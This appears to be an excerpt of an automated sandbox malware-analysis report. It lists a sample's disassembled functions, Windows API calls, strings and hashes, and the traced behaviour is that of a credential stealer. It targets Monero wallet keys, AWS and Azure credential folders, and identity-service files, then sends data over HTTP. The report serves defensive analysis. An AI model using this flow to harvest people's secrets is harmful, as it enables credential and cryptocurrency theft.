Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcess
String ID: ERROR_RUN_EXTRACTOR
API String ID: 4157063783-2709115261
Opcode ID: 0ef0de1779ecc72fe22ff55921f1c81cd8c10d49b8bf42438434cf1c18433415
Instruction ID: ad7409f9765ba7fc23d66d36ab0221d8437f5eaacd9344bce19ba535315bbd35
Opcode Fuzzy Hash: 0ef0de1779ecc72fe22ff55921f1c81cd8c10d49b8bf42438434cf1c18433415
Instruction Fuzzy Hash: E5120E71910108ABCB08EBA0DE96FFEB378BF24305F51455DB507A6192DE35AE09CB63

Function 00ABCEF0 Relevance: 30.4, APIs: 20, Instructions: 375
stringmemoryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00AC8B60: GetSystemTime.KERNEL32(00AD0E1A,005EE870,00AD05AE,?,?,00AB13F9,?,0000001A,00AD0E1A,00000000,?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00AC8B86

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00ABCF83
GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 00ABD0C7
RtlAllocateHeap.NTDLL(00000000), ref: 00ABD0CE
lstrcat.KERNEL32(?,00000000), ref: 00ABD208
lstrcat.KERNEL32(?,00AD1478), ref: 00ABD217
lstrcat.KERNEL32(?,00000000), ref: 00ABD22A
lstrcat.KERNEL32(?,00AD147C), ref: 00ABD239
lstrcat.KERNEL32(?,00000000), ref: 00ABD24C
lstrcat.KERNEL32(?,00AD1480), ref: 00ABD25B
lstrcat.KERNEL32(?,00000000), ref: 00ABD26E
lstrcat.KERNEL32(?,00AD1484), ref: 00ABD27D
lstrcat.KERNEL32(?,00000000), ref: 00ABD290
lstrcat.KERNEL32(?,00AD1488), ref: 00ABD29F
lstrcat.KERNEL32(?,00000000), ref: 00ABD2B2
lstrcat.KERNEL32(?,00AD148C), ref: 00ABD2C1
lstrcat.KERNEL32(?,00000000), ref: 00ABD2D4
lstrcat.KERNEL32(?,00AD1490), ref: 00ABD2E3

Part of subcall function 00ACA820: lstrlen.KERNEL32(00AB4F05,?,?,00AB4F05,00AD0DDE), ref: 00ACA82B
Part of subcall function 00ACA820: lstrcpy.KERNEL32(00AD0DDE,00000000), ref: 00ACA885

lstrlen.KERNEL32(?), ref: 00ABD32A
lstrlen.KERNEL32(?), ref: 00ABD339

Part of subcall function 00ACAA70: StrCmpCA.SHLWAPI(005E88E8,00ABA7A7,?,00ABA7A7,005E88E8), ref: 00ACAA8F

DeleteFileA.KERNEL32(00000000), ref: 00ABD3B4

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
String ID:
API String ID: 1956182324-0
Opcode ID: a495378071fbdb5f6b5471eec58ea6a9069dd8db4e53e0ecb1911e5d1cf0636b
Instruction ID: 202487bd04f2e2960c8ffedc3f735f3d1bfa60b7070ba7dbb65ad4f68c9a4afd
Opcode Fuzzy Hash: a495378071fbdb5f6b5471eec58ea6a9069dd8db4e53e0ecb1911e5d1cf0636b
Instruction Fuzzy Hash: 2EE1DBB1910108ABCB04EBA0DE96FFEB378BF24305F514559F507A6191EE35AE09CB63

Function 00AB4880 Relevance: 30.2, APIs: 11, Strings: 6, Instructions: 479
networkstringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00AB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AB4839
Part of subcall function 00AB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AB4849

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00AB4915
StrCmpCA.SHLWAPI(?,005EFB80), ref: 00AB493A
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AB4ABA
lstrlen.KERNEL32(00000000,00000000,?,?,?,?,00AD0DDB,00000000,?,?,00000000,?,",00000000,?,005EFAA0), ref: 00AB4DE8
lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00AB4E04
HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00AB4E18
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AB4E49
InternetCloseHandle.WININET(00000000), ref: 00AB4EAD
InternetCloseHandle.WININET(00000000), ref: 00AB4EC5
HttpOpenRequestA.WININET(00000000,005EFB40,?,005EF198,00000000,00000000,00400100,00000000), ref: 00AB4B15

Part of subcall function 00ACA9B0: lstrlen.KERNEL32(?,005E8CA8,?,\Monero\wallet.keys,00AD0E17), ref: 00ACA9C5
Part of subcall function 00ACA9B0: lstrcpy.KERNEL32(00000000), ref: 00ACAA04
Part of subcall function 00ACA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00ACAA12

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00ACA920: lstrcpy.KERNEL32(00000000,?), ref: 00ACA972
Part of subcall function 00ACA920: lstrcat.KERNEL32(00000000), ref: 00ACA982

InternetCloseHandle.WININET(00000000), ref: 00AB4ECF

Strings

------, xrefs: 00AB49BD
------, xrefs: 00AB4B28
", xrefs: 00AB4BF2
p^, xrefs: 00AB4B9F, 00AB4CE0
", xrefs: 00AB4D33
------, xrefs: 00AB4C69

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Internet$lstrcpy$lstrlen$CloseHandle$HttpOpenRequestlstrcat$ConnectCrackFileReadSend
String ID: "$"$------$------$------$p^
API String ID: 460715078-3577613220
Opcode ID: 3849668ec9d483abe1a7271703eafd9df22a3a24e4604807b09b3992235a6581
Instruction ID: dd5d8a982eb491dc889327edc48038f167d8df19fd9ee67bbce7d7ca0e5aa0b5
Opcode Fuzzy Hash: 3849668ec9d483abe1a7271703eafd9df22a3a24e4604807b09b3992235a6581
Instruction Fuzzy Hash: 6512A672A1011CABDB15EB90DE92FEEB378BF24304F51459DB10662092EF706E49CB66

Function 00AC5510 Relevance: 24.9, APIs: 7, Strings: 7, Instructions: 383sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA820: lstrlen.KERNEL32(00AB4F05,?,?,00AB4F05,00AD0DDE), ref: 00ACA82B
Part of subcall function 00ACA820: lstrcpy.KERNEL32(00AD0DDE,00000000), ref: 00ACA885

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AC5644
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AC56A1
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AC5857

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00AC51F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AC5228

Part of subcall function 00ACA8A0: lstrcpy.KERNEL32(?,00AD0E17), ref: 00ACA905

Part of subcall function 00AC52C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AC5318
Part of subcall function 00AC52C0: lstrlen.KERNEL32(00000000), ref: 00AC532F
Part of subcall function 00AC52C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00AC5364
Part of subcall function 00AC52C0: lstrlen.KERNEL32(00000000), ref: 00AC5383
Part of subcall function 00AC52C0: lstrlen.KERNEL32(00000000), ref: 00AC53AE

StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AC578B
StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00AC5940
StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00AC5A0C
Sleep.KERNEL32(0000EA60), ref: 00AC5A1B

Strings

ERROR, xrefs: 00AC577D
ERROR, xrefs: 00AC5636
ERROR, xrefs: 00AC5693
ERROR, xrefs: 00AC5932
ERROR, xrefs: 00AC5849
`h], xrefs: 00AC5585, 00AC55E3
ERROR, xrefs: 00AC59FE

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpylstrlen$Sleep
String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR$`h]
API String ID: 507064821-3359987520
Opcode ID: 706cc4274a30fb4d384b8f1c80ce9acf4f83895517046bcec96e9f774e013790
Instruction ID: a5eb733803707ab9f21c2d26b74c80cefb901214596c76afae4e409f4cef1925
Opcode Fuzzy Hash: 706cc4274a30fb4d384b8f1c80ce9acf4f83895517046bcec96e9f774e013790
Instruction Fuzzy Hash: AFE1FD71910108ABCB14FBB0DE96FFDB378AB64344F51852CB50766192EF346E49CBA2

Function 00AC8320 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 196registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

RegOpenKeyExA.KERNEL32(00000000,005EBCD0,00000000,00020019,00000000,00AD05B6), ref: 00AC83A4
RegEnumKeyExA.KERNEL32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00AC8426
wsprintfA.USER32 ref: 00AC8459
RegOpenKeyExA.KERNEL32(00000000,?,00000000,00020019,00000000), ref: 00AC847B
RegCloseKey.ADVAPI32(00000000), ref: 00AC848C
RegCloseKey.ADVAPI32(00000000), ref: 00AC8499

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Strings

- , xrefs: 00AC85A3
%s\%s, xrefs: 00AC844D
?, xrefs: 00AC837A

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: CloseOpenlstrcpy$Enumwsprintf
String ID: - $%s\%s$?
API String ID: 3246050789-3278919252
Opcode ID: 4416e2473f87ab5f6c1d86b4d35bd0bbf9f0ed4e8c93df665eab02a5c4d243b2
Instruction ID: 1b3ace40666a928e830fdb08d13fcd4fc925d68803a3966d79b9839f8ebf420f
Opcode Fuzzy Hash: 4416e2473f87ab5f6c1d86b4d35bd0bbf9f0ed4e8c93df665eab02a5c4d243b2
Instruction Fuzzy Hash: 4E810AB191011CABDB24DB50CD95FEAB7B8FF18704F008699E10AA6180DF756F85CFA5

Function 00AB6280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00ACA7A0: lstrcpy.KERNEL32(?,00000000), ref: 00ACA7E6

Part of subcall function 00AB47B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00AB4839
Part of subcall function 00AB47B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00AB4849

Part of subcall function 00ACA740: lstrcpy.KERNEL32(00AD0E17,00000000), ref: 00ACA788

InternetOpenA.WININET(00AD0DFE,00000001,00000000,00000000,00000000), ref: 00AB62E1
StrCmpCA.SHLWAPI(?,005EFB80), ref: 00AB6303
InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00AB6335
HttpOpenRequestA.WININET(00000000,GET,?,005EF198,00000000,00000000,00400100,00000000), ref: 00AB6385
InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 00AB63BF
HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00AB63D1
HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 00AB63FD
InternetReadFile.WININET(00000000,?,000007CF,?), ref: 00AB646D
InternetCloseHandle.WININET(00000000), ref: 00AB64EF
InternetCloseHandle.WININET(00000000), ref: 00AB64F9
InternetCloseHandle.WININET(00000000), ref: 00AB6503

Strings

GET, xrefs: 00AB637C
ERROR, xrefs: 00AB64C9
ERROR, xrefs: 00AB6407

Memory Dump Source

Source File: 00000000.00000002.2426587570.0000000000AB1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00AB0000, based on PE: true

Associated: 00000000.00000002.2426561938.0000000000AB0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B0A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B35000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B38000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B3F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B42000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B6D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B92000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000B9F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BBF000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000BCE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C55000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426587570.0000000000C7B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000E9A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F75000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000F9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FA5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2426861162.0000000000FB5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427277516.0000000000FB6000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427407446.0000000001157000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2427420221.0000000001158000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ab0000_file.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
String ID: ERROR$ERROR$GET
API String ID: 3749127164-2509457195
Opcode ID: 172b040ca2f94b700e8c9981448b65a3087ca231dbc834e62fe0678fd905d55d
Instruction ID: 7a8869f8e50783cc1241b1f2800d574ef8b88ea4ecbfcddbe20d6ad7d78556df
Opcode Fuzzy Hash: 172b040ca2f94b700e8c9981448b65a3087ca231dbc834e62fe0678fd905d55d
Instruction Fuzzy Hash: C8712F71A00218ABDB24DFA0DD49FEEB778FB44704F108199F50AAB1D1DBB46A85CF52

Function 00AC4D70 Relevance: 22.6, APIs: 6, Strings: 9, Instructions: 123stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00AC8DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00AC8E0B

lstrcat.KERNEL32(?,00000000), ref: 00AC4DB0
lstrcat.KERNEL32(?,\.azure\), ref: 00AC4DCD

Part of subcall function 00AC4910: wsprintfA.USER32 ref: 00AC492C
Part of subcall function 00AC4910: FindFirstFileA.KERNEL32(?,?), ref: 00AC4943

lstrcat.KERNEL32(?,00000000), ref: 00AC4E3C
lstrcat.KERNEL32(?,\.aws\), ref: 00AC4E59

Part of subcall function 00AC4910: StrCmpCA.SHLWAPI(?,00AD0FDC), ref: 00AC4971
Part of subcall function 00AC4910: StrCmpCA.SHLWAPI(?,00AD0FE0), ref: 00AC4987
Part of subcall function 00AC4910: FindNextFileA.KERNEL32(000000FF,?), ref: 00AC4B7D
Part of subcall function 00AC4910: FindClose.KERNEL32(000000FF), ref: 00AC4B92

lstrcat.KERNEL32(?,00000000), ref: 00AC4EC8
lstrcat.KERNEL32(?,\.IdentityService\), ref: 00AC4EE5

Part of subcall function 00AC4910: wsprintfA.USER32 ref: 00AC49B0
Part of subcall function 00AC4910: StrCmpCA.SHLWAPI(?,00AD08D2), ref: 00AC49C5
Part of subcall function 00AC4910: wsprintfA.USER32 ref: 00AC49E2
Part of subcall function 00AC4910: PathMatchSpecA.SHLWAPI(?,?), ref: 00AC4A1E
Part of subcall function 00AC4910: lstrcat.KERNEL32(?,005EFA80), ref: 00AC4A4A
Part of subcall function 00AC4910: lstrcat.KERNEL32(?,00AD0FF8), ref: 00AC4A5C
